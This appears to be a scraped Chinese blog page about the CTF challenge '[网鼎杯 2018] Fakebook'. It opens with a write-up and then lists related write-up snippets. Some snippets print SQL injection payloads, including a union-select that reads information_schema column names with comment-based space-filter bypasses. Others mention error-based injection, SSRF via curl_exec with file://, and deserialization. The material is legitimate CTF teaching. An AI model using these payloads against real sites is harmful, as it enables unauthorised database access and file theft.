登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
buuctf-[网鼎杯 2018]Fakebook
qq_42728977的博客
12-17 1140
[网鼎杯 2018]Fakebook考点复现法1,load_file()法2,纯sql注入总结参考 考点 sql注入 复现 法1,load_file() 注册登陆之后 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 可能存在注入点,尝试,发现确实有 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un
[网鼎杯 2018]Fakebook
qq_43622442的博客
04-20 4225
[网鼎杯 2018]Fakebook 1.打开网站,就两个功能点 2.先打开join看一下,注册页面,随便输入,注册一下: 3.发现登陆进来了:(这里有个坑,注册完了之后就不能回退,去测试之前的login页面了,不过可以直接输入login.php回去测试) 4.发现dawn是个url,点击看一下:(这里我也傻了,我一开始傻里傻气的在username插了个xss,结果没看到这个超链接,在源代码...
网鼎杯 Fakebook
小飒的博客
09-08 209
原题xctf链接:网鼎杯2018[fakebook] 自己没做出来,看了大佬们的wp打算再综合整理下 扫描得知有robots.txt和flag.Php(我的御剑扫不出来robots.txt,不知道为什么(字典里有但扫不到)) Robots.txt里看到user.php.bak 下载保存后获得user.php的源码 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = "";
CTF[网鼎杯]Fakebook
她叫常玉莹
08-25 640
robots中发现 user.php.bak文件 下载文件 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age;
[网鼎杯 2018]Fakebook 解题思路&过程
iamblackcat's blog
09-12 1752
[网鼎杯 2018]Fakebook 解题思路&过程
题解:BUUCTF [网鼎杯 2018]Fakebook 1
qq_62886656的博客
06-14 719
题解
[网鼎杯 2018]Fakebook 1
bazzza的博客
12-20 1133
先注册一个账号看看,发现对blog有过滤,注册完登录进去发现界面是这样的, 可以看到页面下方打开了我们注册的blog,可以大胆的推测他可以进行ssrf,但是blog在注册时是经过过滤的,只能是固定的格式,看起来是难以利用的。 然后,我看别人的wp,对目录扫描后可直接扫描出来robots.txt和flag.php,我自己也扫了一下, https://blog.csdn.net/weixin_43940853/article/details/105081522 ...
[网鼎杯 2018]Fakebook记录
Aiwin的博客
07-17 676
[网鼎杯 2018]Fakebook
网鼎杯--fakebook解题思路
m0_64348326的博客
05-02 489
之前对sql注入不熟悉的时候做了一遍差一步成功,现在学习完又做了一遍,理解又深了... 一、涉及知识点:反序列化、sql序列化注入、信息泄露、ssrf、file伪协议 二、解题过程 打开页面后是这样的 由于join界面blog我怎么输都失败于是准备先进行目录扫描 1、扫描发现user.php.bak文件,下载后打开是页面功能的源码 2.分析代码发现curl_exec()函数,百度搜索发现该函数存在配合file://协议进行任意文件读取的漏洞,规划为反序列化漏洞已经八九不离十了 3.又扫
[网鼎杯 2024]Fakebook网络安全事件分发机制收藏这一篇就够了
最新发布
2401_84185471的博客
04-10 465
注意:序列化内容要在4号位置,这由column的顺序决定。
2018 网鼎杯CTF 第一场
iamsongyu的博客
11-17 3286
哈哈。传说中的pwn鼎杯来了,当时也没做出来什么,现在好好琢磨琢磨。 Web - facebook 首先还是看看网站有啥功能,大概就是一个可以注册登录的,写博客的地方   现在的题目迷惑性很大,不能被表面现象迷惑,猜不透到底是sql注入,还是什么。 从最开始的思路下手,robots git 和sql都试一下 git 无 robots得到信息如下: 发现有源码,下载下来读...
[原题复现][网鼎杯 2018] WEB Fakebook(SSRF、反序列化、SQL注入)
笑花大王
02-27 2699
简介 原题复现: 考察知识点:SSRF、反序列化、SQL注入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 分析了整体结构 点击jion可以添加账号还有博客地址添加OK之后会有ifram把你的博客地址引用到当前页面 jion添加的信息点击进入发现了get注入注入进去没flag 不过在da...
buuctf [网鼎杯 2018]Fakebook 记录
SopRomeo的博客
02-25 3596
首先注册一个账号进去,再查看账户信息,注意url http://2924ddd2-5831-448c-9833-d0aaba7a1fbe.node3.buuoj.cn/view.php?no=1 可能存在sql注入,利用常规的探测,发现他是整形注入,一般的注入行不通,双写绕过不行,试试报错注入, playload:1 and extractvalue(1,concat('~',(select(g...
SSRF漏洞file伪协议之[网鼎杯 2018]Fakebook1
qq_58970968的博客
07-06 1515
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
180829 网鼎杯(4-apl)
whklhhhh的博客
08-30 1546
今天这个难度比较恐怖,只做了一个有类似题目的misc-apl,其实觉得比较接近逆向题 代码解base64后得到看起来很奇怪的apl代码 {⍵(~⍵)/('No_Please_continue')('Yes,This_is_flag')}(∊(41(41)0+140)(⎕UCS('µě»ÕĀ$#Ğ$èáËĞĞĝ`âÞĠ\x9d#"!Ġ"KE(©$#Ğ$Q&lt;k'))146){+/⍺≠33...
BUUCTF__[网鼎杯 2018]Fakebook_题解
风过江南乱的博客
07-04 2100
BUUCTF__[网鼎杯 2018]Fakebook_题解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

泷羽Sec

公众号【小羽网安】

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值